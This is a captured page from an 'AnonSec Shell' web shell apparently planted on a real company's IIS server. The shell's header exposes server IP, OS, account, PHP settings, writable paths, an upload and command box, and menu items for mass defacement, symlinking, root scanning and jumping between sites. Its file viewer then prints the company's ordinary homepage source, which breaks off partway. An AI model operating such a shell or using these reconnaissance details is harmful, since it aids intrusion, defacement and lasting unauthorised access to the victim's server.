. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . AnonSec Shell
AnonSec Shell
Server IP : 87.98.249.37  /  Your IP : 216.73.216.208   [ Reverse IP ]
Web Server : Microsoft-IIS/10.0
System : Windows NT NS3076740 10.0 build 17763 (Windows Server 2019) AMD64
User : IWPD_292(growel19p) ( 0)
PHP Version : 8.3.12
Disable Function : NONE
Domains : 0 Domains
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/Inetpub/vhosts/growel.com/httpdocs/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : C:/Inetpub/vhosts/growel.com/httpdocs//Default.aspx
<%@ Page Title="" Language="C#" MasterPageFile="~/Main.Master" AutoEventWireup="true" CodeBehind="Default.aspx.cs" Inherits="GrowelWeb.Default" %>
<asp:Content ID="Content1" ContentPlaceHolderID="head" runat="server">
<style>
.customers{
display: flex;
gap: 100px;
justify-content: center;
align-items: center;
height: 300px;
}
.link-image img {
max-width: none;
}
.quote-creative__image {
max-width: 100%;
height: auto;
display: block;
border-radius: 50%; /* Optional: for circular images */
}
.quote-creative__image-wrap {
width: 88px; /* Or any % or rem based on your layout */
height: auto;
}
@media (min-width: 768px) {
h1 {
font-size: 30px;
}
}
@media (min-width: 1200px) {
h1 {
font-size: 55px;
}
}
@media (max-width: 992px) {
h1 {
font-size: 43px;
}
}
@media (min-width: 1200px) {
.quote-creative__header+.quote-creative__main {
min-height: 490px;
padding-top: 85px;
}
}
/* Hide mobile banners on desktop */
.mobile-only {
display: none;
}
/* Hide desktop banners on mobile */
.desktop-only {
display: none;
}
/* Media query for mobile view */
@media (max-width: 768px) {
.mobile-only {
display: block; /* Show mobile banners */
}
}
/* Media query for desktop view */
@media (min-width: 769px) {
.desktop-only {
display: block; /* Show desktop banners */
}
}
}
</style>
	
	<style>

	swiper-container {
      width: 100%;
      height: 100%;
    }

	swiper-slide {
      /*text-align: center;
      font-size: 18px;
      background: #444;
	  justify-content: center;
      align-items: center;
      */
      display: flex;
      
    }

     swiper-slide img {
      display: block;
      width: 100%;
      height: 100%;
      object-fit: cover;
    }

	

	 :root {
	--swiper-theme-color: #ff0000;
	--swiper-navigation-color: red;
	--swiper-pagination-color: red;
}



	</style>
	
	<!-- for counter-->
	<style>
    

     /* Set modal size responsive */
.modal-custom-size {
    align-items:center;
    max-width: 35%;
    
}

/* Responsive background image */
.popup-bg {
    background-image: url('isf-popup.jpg');
    background-size: cover;
    background-position: center;
    background-repeat: no-repeat;
    border-radius: 12px;
    height: 600px;
}

/* Close Button */
.popup-close-btn {
    position: absolute;
    top: 10px;
    right: 10px;
    background: transparent;
    border: none;
    z-index: 999;
}

.popup-close-btn img {
    width: 30px;
    height: 30px;
}

/* Timer Box Wrapper */
/*.timer-wrapper {
    width: 100%;
    padding: 10px;
    background: rgba(255, 255, 255, 0.6);
    border-radius: 10px;
    text-align: center;
    color: #000;
    margin-bottom: 20px;
}

*/


    .timer-container {
        display: flex;
        gap: 10px;
        padding-left:10px;
        margin-top: 500px;
    }

    .time-box {
        background: #ff2020;
        color: white;
        padding: 5px 5px;
        border-radius: 10px;
        text-align: center;
        min-width: 50px;
    }

    .time-box h2 {
        font-size: 22px;
        margin: 0;
        color:white;
        font-weight: bold;
    }

    .time-box small {
        display: block;
        margin-top: 5px;
        font-size: 12px;
        text-transform: uppercase;
        opacity: 0.8;
    }

    /* Responsive for small screens */
@media (max-width: 480px) {

	
	
	.modal-custom-size {
    align-items:center;
    max-width: 95%;
  /*  width: 350px;*/
}
	
	.popup-bg {
    background-image: url('isf-popup.jpg');
    background-size: cover;
    background-position: center;
    background-repeat: no-repeat;
    border-radius: 12px;
    height: 440px;
}


	
    .time-box {
        background: #ff2020;
        color: white;
        padding: 3px 3px;
        border-radius: 10px;
        text-align: center;
        min-width: 50px;
    }

    .timer-container {
        display: flex;
        gap: 10px;
        padding-left:10px;
        margin-top: 365px;
    }



    .time-box h2 {
        font-size: 20px;
    }

    .time-box small {
        display: block;
        margin-top: 3px;
        font-size: 10px;
        text-transform: uppercase;
        opacity: 0.8;
    }

}
		
@media screen and (min-width: 1920px)  {

			
	.modal-custom-size {
    align-items:center;
    max-width: 25%;
  /*  width: 350px;*/
	}
		}	
		
		@media screen and (min-width: 768px) and (max-width: 1024px) {

			
	.modal-custom-size {
    align-items:center;
    max-width: 40%;
  /*  width: 350px;*/
}
	
	.popup-bg {
    background-image: url('isf-popup.jpg');
    background-size: cover;
    background-position: center;
    background-repeat: no-repeat;
    border-radius: 12px;
    height: 440px;
}


	
    .time-box {
        background: #ff2020;
        color: white;
        padding: 3px 3px;
        border-radius: 10px;
        text-align: center;
        min-width: 50px;
    }

    .timer-container {
        display: flex;
        gap: 10px;
        padding-left:10px;
        margin-top: 360px;
    }



    .time-box h2 {
        font-size: 20px;
    }

    .time-box small {
        display: block;
        margin-top: 3px;
        font-size: 10px;
        text-transform: uppercase;
        opacity: 0.8;
    }

			
			
		}


	</style>
	
<!-- Preload the LCP image with a high fetchpriority so it starts loading with the stylesheet. -->
<link rel="preload" fetchpriority="high" as="image" href="Includes/images/slider-1-slide-5-1920x749-1.webp" type="image/webp">
</asp:Content>

<asp:Content ID="Content2" ContentPlaceHolderID="ContentPlaceHolder1" runat="server">
<!-- Swiper -->

	 <script src="https://cdn.jsdelivr.net/npm/swiper@11/swiper-element-bundle.min.js"></script>
	<%--<swiper-container class="mySwiper swiper-slider_style-1" navigation="true">--%>
	<swiper-container class="mySwiper swiper-slider_style-1" pagination="true" pagination-clickable="true" navigation="true" space-between="30"
		centered-slides="true" autoplay-delay="5000" autoplay-disable-on-interaction="false">
    
		
		
        <swiper-slide>
            <div class="swiper-slide bg-gray-dark">
                <div class="swiper-slide bg-gray-dark">
                    <div class="slide-inner desktop-only" style="background-image: url(Includes/images/slider-1-slide-10-1920x749.jpg);">
                        <a href="https://growel.com/growels-anodizing-solutions/">
                            <div class="swiper-slide-caption">
                                <div class="shell">
                                    <h1 data-caption-animate="fadeInUpSmall">Function And Beauty
                                        <br>
                                        Growel's Anodizing Solutions</h1>
                                    <div class="object-decorated">
                                        <span class="object-decorated__divider" data-caption-animate="fadeInRightSmall" data-caption-delay="300"></span>
                                        <h5 data-caption-animate="fadeInRightSmall" data-caption-delay="550">State-of-the-art anodising solutions designed for performance and aesthetics, 
	<br>
                                            backed by decades of expertise and supported by a reliable logistics network.
                                        </h5>

                                    </div>
                                    <br>
                                    <br>
                                    <a style="color: white" class="button button-primary" data-toggle="modal" href="https://growel.com/growels-anodizing-solutions/">Know More</a>
                                </div>
                            </div>
                        </a>
                    </div>
                    <div class="slide-inner mobile-only" style="background-image: url(Includes/images/slider-1-slide-10-m.jpg);">
                        <a href="https://growel.com/growels-anodizing-solutions/">
                            <div class="swiper-slide-caption">
                                <div class="shell">
                                    <h1 data-caption-animate="fadeInUpSmall">Function And Beauty
	<br>
                                        Growel's Anodizing Solutions
                                    </h1>
                                    <div class="object-decorated">
                                        <span class="object-decorated__divider" data-caption-animate="fadeInRightSmall" data-caption-delay="300"></span>
                                        <h5 data-caption-animate="fadeInRightSmall" data-caption-delay="550">State-of-the-art anodising solutions designed for performance and aesthetics, backed by decades of expertise and 
	<br>
                                            supported by a reliable logistics network.
                                        </h5>


                                    </div>
                                    <a style="color: white" class="button button-primary" data-toggle="modal" href="https://growel.com/growels-anodizing-solutions/">Know More</a>
                                </div>
                            </div>
                        </a>
                    </div>
                </div>
            </div>
        </swiper-slide>
        <swiper-slide>
            <div class="swiper-slide bg-gray-dark">
                <div class="slide-inner desktop-only" style="background-image: url(Includes/images/slider-1-slide-12.webp);">
                    <a href="https://growel.com/grodal-rust-preventives/">
                        <div class="swiper-slide-caption">
                            <div class="shell">
                                <h1 data-caption-animate="fadeInUpSmall">Advanced Rust Prevention
                                    <br>
                                    for Every Industry.</h1>
                                <div class="object-decorated">
                                    <span class="object-decorated__divider" data-caption-animate="fadeInRightSmall" data-caption-delay="300"></span>
                                    <h5 data-caption-animate="fadeInRightSmall" data-caption-delay="550">From automotive components to heavy machinery, Grodal's solvent, oil, and<br>
                                        water-based rust preventives deliver lasting protection and eco-friendly performance.
                                    </h5>

                                </div>
                                <br>
                                <br>
                                <a style="color: white" class="button button-primary" data-toggle="modal" href="https://growel.com/grodal-rust-preventives/">Know More</a>
                            </div>
                        </div>
                    </a>
                </div>
                <div class="slide-inner mobile-only" style="background-image: url(Includes/images/slider-1-slide-12-M.webp);">
                    <a href="= https://growel.com/grodal-rust-preventives/">
                        <div class="swiper-slide-caption">
                            <div class="shell">
                                <h1 data-caption-animate="fadeInUpSmall">Advanced Rust Prevention 
	<br>
                                    for Every Industry
                                </h1>
                                <div class="object-decorated">
                                    <span class="object-decorated__divider" data-caption-animate="fadeInRightSmall" data-caption-delay="300"></span>
                                    <h5 data-caption-animate="fadeInRightSmall" data-caption-delay="550">From automotive components to heavy machinery, Grodal's solvent, oil, and
                                        <br>
                                        water-based rust preventives deliver lasting protection and eco-friendly performance.
                                    </h5>


                                </div>
                                <a style="color: white" class="button button-primary" data-toggle="modal" href="= https://growel.com/grodal-rust-preventives/">Know More</a>
                            </div>
                        </div>
                    </a>
                </div>
            </div>
        </swiper-slide>
        <swiper-slide>
            <div class="swiper-slide bg-gray-dark">
                <div class="slide-inner desktop-only" style="background-image: url(Includes/images/slider-1-slide-5-1920x749-1.webp);">
                    <a href="https://growel.com/growel-plating-on-plastics-reliable">
                        <div class="swiper-slide-caption">
                            <div class="shell">
                                <h1 class="main" data-caption-animate="fadeInUpSmall">Excellent Stability
                                    <br>
                                    Enhanced Tolerance</h1>
                                <div class="object-decorated">
                                    <span class="object-decorated__divider" data-caption-animate="fadeInRightSmall" data-caption-delay="300"></span>
                                    <h5 data-caption-animate="fadeInRightSmall" data-caption-delay="550">Designed for automatic lines,
                                        <br>
                                        GINPLAST Series - A perfect partner for your plating on plastic process.</h5>
                                </div>
                                <br>
                                <br>
                                <a style="color: white" class="button button-primary" data-toggle="modal" href="https://growel.com/Business/chemicals/plating-on-plastics">Know More</a>

                            </div>

                        </div>
                    </a>
                </div>
                <div class="slide-inner mobile-only" style="background-image: url(Includes/images/slider-1-slide-5.webp);">

                    <a href="https://growel.com/business/chemicals/plating-on-plastics">
                        <div class="swiper-slide-caption">
                            <div class="shell">
                                <h1 class="main" data-caption-animate="fadeInUpSmall">Excellent Stability
                                    <br>
                                    Enhanced Tolerance</h1>
                                <div class="object-decorated">
                                    <span class="object-decorated__divider" data-caption-animate="fadeInRightSmall" data-caption-delay="300"></span>
                                    <h5 data-caption-animate="fadeInRightSmall" data-caption-delay="550">Designed for automatic lines,
                                        <br>
                                        GINPLAST Series - A perfect partner for your plating on plastic process.</h5>

                                </div>
                                <a style="color: white" class="button button-primary" data-toggle="modal" href="https://growel.com/business/chemicals/plating-on-plastics">Know More</a>
                            </div>
                        </div>
                    </a>
                </div>
            </div>
        </swiper-slide>
        <swiper-slide>
            <div class="swiper-slide bg-gray-dark">
                <div class="slide-inner desktop-only" style="background-image: url(Includes/images/slider-1-slide-2-1920x749.jpg);">
                    <a href="https://growel.com/page/company-profile">
                        <div class="swiper-slide-caption">
                            <div class="shell">
                                <h1 class="main" data-caption-animate="fadeInUpSmall">Trust the leader in
                                    <br>
                                    Surface Finishing</h1>
                                <div class="object-decorated">
                                    <span class="object-decorated__divider" data-caption-animate="fadeInRightSmall" data-caption-delay="300"></span>
                                    <h5 data-caption-animate="fadeInRightSmall" data-caption-delay="550">Since its inception in 1957,
                                        <br>
                                        Grauer & Weil (I) Ltd has been a pioneer in the General Metal Finishing Industry
                                    </h5>
                                </div>
                                <br>
                                <br>
                                <a style="color: white" class="button button-primary" data-toggle="modal" href="https://growel.com/page/company-profile">Know More</a>
                            </div>
                        </div>
                    </a>
                </div>
                <div class="slide-inner mobile-only" style="background-image: url(Includes/images/slider-1-slide-2.jpg);">
                    <a href="https://growel.com/page/company-profile">
                        <div class="swiper-slide-caption">
                            <div class="shell">
                                <h1 class="main" data-caption-animate="fadeInUpSmall">Trust the leader in
                                    <br>
                                    Surface Finishing</h1>
                                <div class="object-decorated">
                                    <span class="object-decorated__divider" data-caption-animate="fadeInRightSmall" data-caption-delay="300"></span>
                                    <h5 data-caption-animate="fadeInRightSmall" data-caption-delay="550">Since its inception in 1957,
                                        <br>
                                        Grauer & Weil (I) Ltd has been a pioneer in the General Metal Finishing Industry
                                    </h5>
                                </div>
                                <a style="color: white" class="button button-primary" data-toggle="modal" href="https://growel.com/page/company-profile">Know More</a>
                            </div>
                        </div>
                    </a>
                </div>
            </div>
        </swiper-slide>
        <swiper-slide>
            <div class="swiper-slide bg-gray-dark">
                <div class="slide-inner desktop-only" style="background-image: url(Includes/images/slider-1-slide-3-1920x749.jpg);">
                    <a href="https://growel.com/page/branches">
                        <div class="swiper-slide-caption">
                            <div class="shell">
                                <h1 data-caption-animate="fadeInUpSmall">Right Chemistry to
                                    <br>
                                    Build a Better Tomorrow</h1>
                                <div class="object-decorated">
                                    <span class="object-decorated__divider" data-caption-animate="fadeInRightSmall" data-caption-delay="300"></span>
                                    <h5 data-caption-animate="fadeInRightSmall" data-caption-delay="550">1500+ products, 10000+ happy customers, spread across 7 regions 
	and
                                        <br>
                                        50+ countries
                                    </h5>
                                </div>
                                <br>
                                <a style="color: white" class="button button-primary" data-toggle="modal" href="https://growel.com/page/branches">Know More</a>
                            </div>
                        </div>
                    </a>
                </div>
                <div class="slide-inner mobile-only" style="background-image: url(Includes/images/slider-1-slide-3.jpg);">
                    <a href="https://growel.com/page/branches">
                        <div class="swiper-slide-caption">
                            <div class="shell">
                                <h1 data-caption-animate="fadeInUpSmall">Right Chemistry to
                                    <br>
                                    Build a Better Tomorrow</h1>
                                <div class="object-decorated">
                                    <span class="object-decorated__divider" data-caption-animate="fadeInRightSmall" data-caption-delay="300"></span>
                                    <h5 data-caption-animate="fadeInRightSmall" data-caption-delay="550">1500+ products, 10000+ happy customers, spread across 7 regions and 50+ countries
                                    </h5>
                                </div>
                                <a style="color: white" class="button button-primary" data-toggle="modal" href="https://growel.com/page/branches">Know More</a>
                            </div>
                        </div>
                    </a>
                </div>
            </div>
        </swiper-slide>

        <swiper-slide>
            <div class="swiper-slide bg-gray-dark">
                <div class="slide-inner desktop-only" style="background-image: url(Includes/images/slider-1-slide-4-1920x749.jpg);">
                    <a href="https://growel.com/page/rnd">
                        <div class="swiper-slide-caption">
                            <div class="shell">
                                <h1 data-caption-animate="fadeInUpSmall">Trusted
                                    <br>
                                    By the Best</h1>
                                <div class="object-decorated">
                                    <span class="object-decorated__divider" data-caption-animate="fadeInRightSmall" data-caption-delay="300"></span>
                                    <h5 data-caption-animate="fadeInRightSmall" data-caption-delay="550">First Chemical Company in India to have received AS9100 aerospace 
certification
                                        <br>
                                        established by the Aerospace Industry, which demonstrates our ability to satisfy 
                                        <br>
                                        DOD, NASA and FAA Quality Standards
                                    </h5>
                                </div>
                                <br>
                                <a style="color: white" class="button button-primary" data-toggle="modal" href="https://growel.com/page/rnd">Know More</a>
                            </div>
                        </div>
                    </a>
                </div>
                <div class="slide-inner mobile-only" style="background-image: url(Includes/images/slider-1-slide-4.jpg);">
                    <a href="https://growel.com/page/rnd">
                        <div class="swiper-slide-caption">
                            <div class="shell">
                                <h1 data-caption-animate="fadeInUpSmall">Trusted
                                    <br>
                                    By the Best</h1>
                                <div class="object-decorated">
                                    <span class="object-decorated__divider" data-caption-animate="fadeInRightSmall" data-caption-delay="300"></span>
                                    <h5 data-caption-animate="fadeInRightSmall" data-caption-delay="550">First Chemical Company in India to have received AS9100 aerospace certification established by<br>
                                        the Aerospace Industry, which demonstrates our ability to satisfy DOD, NASA and FAA Quality Standards
                                    </h5>
                                </div>
                                <a style="color: white" class="button button-primary" data-toggle="modal" href="https://growel.com/page/rnd">Know More</a>
                            </div>
                        </div>
                    </a>
                </div>
            </div>

        </swiper-slide>

        
		<swiper-slide><div class="swiper-slide bg-gray-dark">
<div class="slide-inner desktop-only" style="background-image: url(Includes/images/slider-1-slide-21.jpg);">
<a href="https://growel.com/metal-wood-lacquer-finishes/">
<div class="swiper-slide-caption">
<div class="shell">
<h1 data-caption-animate="fadeInUpSmall">&nbsp;
<br>
Lacquered to Perfection</h1>
<div class="object-decorated">
<span class="object-decorated__divider" data-caption-animate="fadeInRightSmall" data-caption-delay="300"></span>
<h5 data-caption-animate="fadeInRightSmall" data-caption-delay="550">&nbsp; <br>LACQUER SOLUTIONS FROM THE LEADER IN SURFACE FINISHING
</h5>
</div>
	<br>
	<a style="color:white" class="button button-primary" data-toggle="modal"  href="https://growel.com/metal-wood-lacquer-finishes/">Get Quote</a>
</div>
</div>
</a>
</div>
<div class="slide-inner mobile-only" style="background-image: url(Includes/images/slider-1-slide-21-m.jpg);">
<a href="https://growel.com/metal-wood-lacquer-finishes/">
<div class="swiper-slide-caption">
<div class="shell">
<h1 data-caption-animate="fadeInUpSmall">&nbsp;
<br>
	<br>
	
	
Lacquered to Perfection</h1>
<div class="object-decorated">
<span class="object-decorated__divider" data-caption-animate="fadeInRightSmall" data-caption-delay="300"></span>
<h5 data-caption-animate="fadeInRightSmall" data-caption-delay="550">&nbsp;<br>
	
LACQUER SOLUTIONS FROM THE LEADER IN SURFACE FINISHING
</h5>
</div>
	<a style="color:white" class="button button-primary" data-toggle="modal"  href="https://growel.com/metal-wood-lacquer-finishes/">Get Quote</a>
</div>
</div>
</a>
</div>
</div></swiper-slide>
		
   
  </swiper-container>

	
<!-- Production-->
<section class="section section-md bg-white">
<div class="shell shell-wide wow fadeInUpSmall" data-wow-offset="150">
<!-- Owl Carousel-->
<div class="owl-carousel owl-carousel_style-2" data-items="1" data-sm-items="2" data-md-items="3" data-lg-items="5" data-dots="false" data-nav="false" data-stage-padding="15" data-loop="true" data-margin="30" data-mouse-drag="false">
<div class="item">
<a class="thumb-corporate" href="<%=siteurl%>business/chemicals">
<div class="thumb-corporate__inner">
<img loading="lazy" src="Includes/images/production-chemicals.webp" title="Acid zinc plating chemicals" alt="Acid zinc plating chemicals" width="370" height="303" />
</div>
<p class="thumb-corporate__title">Chemicals</p>
</a>
</div>
<div class="item">
<a class="thumb-corporate" target="_blank" href="https://engineering.growel.com">
<div class="thumb-corporate__inner">
<img loading="lazy" src="Includes/images/production-Engineering.webp" title="Engineering" alt="Engineering" width="370" height="303" />
</div>
<p class="thumb-corporate__title">Engineering</p>
</a>
</div>
<div class="item">
<a class="thumb-corporate" href="<%=siteurl%>business/paints">
<div class="thumb-corporate__inner">
<img src="Includes/images/production-paint.webp" title="antifouling paint" alt="antifouling paint" width="250px" height="300px" />
</div>
<p class="thumb-corporate__title">Paints</p>
</a>
</div>
<div class="item">
<a class="thumb-corporate" href="<%=siteurl%>business/lubricants">
<div class="thumb-corporate__inner">
<img loading="lazy" src="Includes/images/production-lubs.webp" title="industrial lubricants manufacturers in india" alt="industrial lubricants manufacturers in india" width="250px" height="300px" />
</div>
<p class="thumb-corporate__title">Lubricants</p>
</a>
</div>
<div class="item">
<a class="thumb-corporate" target="_blank" href="https://www.growels101.com/">
<div class="thumb-corporate__inner">
<img loading="lazy" src="Includes/images/real-estate-owl.webp" title="Real Estate" alt="Real Estate" width="250px" height="300px" />
</div>
<p class="thumb-corporate__title">Real Estate</p>
</a>
</div>
</div>
</div>
</section>
<!-- Experience since 1999-->
<section class="section section-md bg-gray-4">
<div class="shell">
<div class="range range-50 range-sm-center range-md-reverse range-md-justify range-md-middle">
<div class="cell-sm-10 cell-md-6 cell-lg-5 wow fadeInRight">
<div class="block-wrap-1">
<h2><span>Experience</span><span class="object-decorated object-decorated_inline" style="max-width: 125px;"><span class="object-decorated__divider"></span><span class="heading-5">since 1957 </span></span></h2>
<p>Grauer & Weil (India) Limited or Growel has been a trail blazer in the Surface finishing field. Growel is the only company in India and one of the few in the world that offers complete corrosion protection solutions on all types of substrates across various industry segments.</p>
<p>Growel became the first Indian surface finishing solution company to be AS 9100 certified in 2016.</p>
<div class="group-lg group-middle">
<a class="button button-primary" data-toggle="modal" data-target="#darkModalForm" href="#">Learn More</a>
<div>
<div class="unit unit-horizontal unit-middle unit-spacing-xs">
<div class="unit__left" style="font-size: 0;"><a class="link link-video" target="_blank" href="https://youtu.be/LGwJC-lX56Q?si=cCm4JEjT-gjYy8mu" data-lightbox="iframe"></a></div>
<div class="unit__body">
<h5>Video
<br>
Presentation</h5>
</div>
</div>
</div>
</div>
</div>
</div>
<div class="cell-sm-10 cell-md-6 wow fadeInLeft">
<div class="grid-layout-2x2">
<div class="grid-item">
<!-- Box counter-->
<article class="box-counter-modern">
<div class="box-counter-modern__wrap">
<div class="counter" style="font-size:45px" data-zero="true">65</div>
<span class="plus">&#43;</span>
</div>
<p class="box-counter-modern__title">Years
<br>
in the
<br>
Surface Finishing Industry</p>
</article>
</div>
<div class="grid-item">
<!-- Box counter-->
<article class="box-counter-modern">
<div class="box-counter-modern__wrap">
<div class="counter" style="font-size:45px" data-zero="true">100</div>
<span class="plus">&#43;</span>
</div>
<p class="box-counter-modern__title">Dealers & Distributors Countrywide</p>
</article>
</div>
<div class="grid-item">
<!-- Box counter-->
<article class="box-counter-modern">
<div class="box-counter-modern__wrap">
<div class="counter" style="font-size:45px" data-zero="true">800</div>
<span class="plus">&#43;</span>
</div>
<p class="box-counter-modern__title">Projects Worldwide</p>
</article>
</div>
<div class="grid-item">
<!-- Box counter-->
<article class="box-counter-modern">
<div class="box-counter-modern__wrap">
<div class="counter" style="font-size:45px" data-zero="true">10000 </div>
<span class="plus">&#43;</span>
</div>
<p class="box-counter-modern__title">Happy Customers</p>
</article>
</div>
</div>
</div>
</div>
</div>
</section>
<!-- Our Projects-->
<section class="section section-md bg-white text-center">
<div class="shell-fullwidth">
<h2>Industries Served</h2>
<!-- Owl Carousel-->
<div class="owl-carousel owl-carousel_style-2 wow fadeIn" data-items="1" data-sm-items="2" data-md-items="3" data-lg-items="4" data-dots="true" data-nav="true" data-loop="false" data-stage-padding="0" data-sm-stage-padding="20" data-md-stage-padding="0" data-sm-margin="15" data-lg-margin="0" data-mouse-drag="false">
<div class="thumb-janez">
<figure class="thumb-janez__image-wrap">
<img loading="lazy" src="Includes/images/project-5-481x383.webp" title="Electronics and PCB"  alt="Electronics and PCB" width="481" height="383" />
</figure>
<div class="thumb-janez__content bg-gray-dark">
<div class="thumb-janez__content-inner">
<h5><a href="#">Electronics and PCB</a></h5>
<p>
We offer leading edge solutions for the electronics & PCB sectors. Our system-oriented approach ensures that our customers have access to a broad array of top-notch plating chemistries, equipment technologies, and after-sales services.
</p>
<a class="button button-xs button-darker" href="<%=siteurl%>industry/electronics-and-pcb">read more</a>
</div>
</div>
</div>
<div class="thumb-janez">
<figure class="thumb-janez__image-wrap">
<img loading="lazy" src="Includes/images/project-1-481x383.webp" title="Auto & Auto Ancillary" alt="Auto & Auto Ancillary" width="481" height="383" />
</figure>
<div class="thumb-janez__content bg-gray-dark">
<div class="thumb-janez__content-inner">
<h5><a href="#">Auto & Auto Ancillary</a></h5>
<p>
Growel being trail blazers in the Indian metal finishing industry understands the requirement of higher durability for automotive industry and keep the environmental footprint into consideration while forming plating chemicals.
</p>
<a class="button button-xs button-darker" href="<%=siteurl%>industry/auto-ancillary">read more</a>
</div>
</div>
</div>
<div class="thumb-janez">
<figure class="thumb-janez__image-wrap">
<img loading="lazy" src="Includes/images/project-2-481x383.webp" title="Jewellery" alt="Jewellery" width="481" height="383" />
</figure>
<div class="thumb-janez__content bg-gray-dark">
<div class="thumb-janez__content-inner">
<h5><a href="#">Jewellery</a></h5>
<p>Growel offers a wide range of precious metal plating chemicals, both Decorative and Industrial.</p>
<a class="button button-xs button-darker" href="<%=siteurl%>industry/jewellery">read more</a>
</div>
</div>
</div>
<div class="thumb-janez">
<figure class="thumb-janez__image-wrap">
<img loading="lazy" src="Includes/images/project-3-481x383.webp" title="Sanitary" alt="Sanitary" width="481" height="383" />
</figure>
<div class="thumb-janez__content bg-gray-dark">
<div class="thumb-janez__content-inner">
<h5><a href="#">Sanitary</a></h5>
<p>
Sanitary fittings are processed with different types of decorative coating, which have excellent corrosion resistance. Growel offers complete plating solutions which are lead and nickel free and come at various price points to suit the customers end requirement.
</p>
<a class="button button-xs button-darker" href="<%=siteurl%>industry/sanitaryfittings">read more </a>
</div>
</div>
</div>
<div class="thumb-janez">
<figure class="thumb-janez__image-wrap">
<img loading="lazy" src="Includes/images/project-4-480x383.webp" title="Aerospace" alt="Aerospace" width="480" height="383" />
</figure>
<div class="thumb-janez__content bg-gray-dark">
<div class="thumb-janez__content-inner">
<h5><a href="#">Aerospace</a></h5>
<p>Growel has introduced several electroplating processes in India to suit its usage in the processing of parts for Aerospace industry. Plated components are tested as per ASTMB-117 and exceeds the stringent AMS and military specification requirements.</p>
<a class="button button-xs button-darker" href="<%=siteurl%>industry/aerospace">read more</a>
</div>
</div>
</div>
<div class="thumb-janez">
<figure class="thumb-janez__image-wrap">
<img loading="lazy" src="Includes/images/fastener.webp" title="Fastener" alt="Fastener" width="480" height="383" />
</figure>
<div class="thumb-janez__content bg-gray-dark">
<div class="thumb-janez__content-inner">
<h5><a href="#">Fastener</a></h5>
<p>Fasteners play a critical role across industries, and ensuring their quality, durability, and performance is paramount. At Growel, we deliver proven solutions tailored to every stage of fastener manufacturing.
</p>
<a class="button button-xs button-darker" href="<%=siteurl%>industry/fastener">read more </a>
</div>
</div>
</div>
</div>
</div>
</section>
<!-- Testimonials-->
<section class="section section-md bg-white text-center">
<div class="shell">
<h2>Testimonials</h2>
<div class="range range-50">
<div class="cell-sm-6 cell-md-4 wow fadeInUpSmall">
<!-- Quote creative-->
<article class="quote-creative">
<div class="quote-creative__header">
<div class="quote-creative__image-wrap">
<img loading="lazy" class="quote-creative__image" src="Includes/images/testimonials-1-88x88.webp" alt="aluminium paint" title="aluminium paint"  width="88" height="88"  />
</div>
</div>
<div class="quote-creative__main">
<p class="q">
Our company’s main motto is to give quality product to our customers. Talking about quality Growel has helped us in meeting International standards. Today we are at par with the International players with the help of Growel.
We look forward for a long-term relation with Grauer & Weil (I) Ltd.
</p>
<ul class="quote-creative__meta">
<li><span class="cite"><strong>Amit Arora</strong></span></li>
<!--                          <li><span class="small"><strong>General Manager- Works - L & K</strong>  </span></li>
-->
</ul>
</div>
</article>
</div>
<div class="cell-sm-6 cell-md-4 wow fadeInUpSmall" data-wow-delay=".2s">
<!-- Quote creative-->
<article class="quote-creative">
<div class="quote-creative__header">
<div class="quote-creative__image-wrap">
<img loading="lazy" class="quote-creative__image" src="Includes/images/testimonials-2-88x88.webp" alt="blackening metal" title="blackening metal" width="88" height="88" />
</div>
</div>
<div class="quote-creative__main">
<p class="q">
Embarking on our Company’s long-term vision, we had installed an automatic plating plant with multi loading and multifunctional line with the help of Grauer & Weil.
With the technical support from Grauer & Weil from establishing the process to 24x7 technical support we could achieve our desired quality and have reduced the dependency on multi skilled operators in our factory.
We thank Grauer & Weil for their splendid technical support and look forward for their continual support in achieving our vision.
</p>
<ul class="quote-creative__meta">
<li><span class="cite"><strong>Sukrit Bansal</strong></span></li>
<!--                          <li><span class="small"><strong>Director – Dorset (India)</strong></span></li>
-->
</ul>
</div>
</article>
</div>
<div class="cell-sm-6 cell-md-4 wow fadeInUpSmall" data-wow-delay=".3s">
<!-- Quote creative-->
<article class="quote-creative">
<div class="quote-creative__header">
<div class="quote-creative__image-wrap">
<img loading="lazy" class="quote-creative__image" src="Includes/images/testimonials-3-88x88.webp"
alt="chrome plating" title="chrome plating" width="88" height="88" />
</div>
</div>
<div class="quote-creative__main">
<p class="q">At Prius, we believe in quality services and continuous development to meet the customers requirement. Recently we have set up a complete Automatic ABS plant in Haryana. In this plant we are using Chemicals and Chemistry of Grauer & Weil and are completely satisfied. The technical team of Grauer & Weil regularly visits our facility and with their continuous technical assistance, we are able to regularly meet our customer’s quality requirements.</p>
<ul class="quote-creative__meta">
<li><span class="cite"><strong>Deepak Mangal</strong></span></li>
<!--                          <li><span class="small"> <strong>Proprietor – Prius Auto Industries</strong></span></li>
-->
</ul>
</div>
</article>
</div>
</div>
</div>
</section>
<marquee  direction="left" behavior="scroll" scrollamount="15">
<section class="customers">
<div class="item"><a class="link-image">
<img loading="lazy" src="Includes/images/logos/mahin.webp" title="Logo1" alt="Logo1" width="156" height="45" /></a></div>
<div class="item"><a class="link-image">
<img loading="lazy" src="Includes/images/logos/dorset.webp" title ="logo2" alt="Logo2" width="126" height="69" /></a></div>
<div class="item"><a class="link-image">
<img loading="lazy" src="Includes/images/logos/tata.webp" title="Logo3" alt="Logo3" width="150" height="36" /></a></div>
<div class="item"><a class="link-image">
<img loading="lazy" src="Includes/images/logos/2000px-Godrej_Logo.svg.webp" title="Logo4" alt="Logo4" width="130" height="45" /></a></div>
<div class="item"><a class="link-image">
<img loading="lazy" src="Includes/images/logos/2000px-Hindustan_Aeronautics_Limited_Logo.svg.webp" title="Logo5" alt="Logo5" width="130" height="45" /></a></div>
<div class="item"><a class="link-image">
<img loading="lazy" src="Includes/images/logos/2000px-Indian_Railway.svg.webp" title="Logo6" alt="Logo6" width="130" height="45" /></a></div>
<div class="item"><a class="link-image">
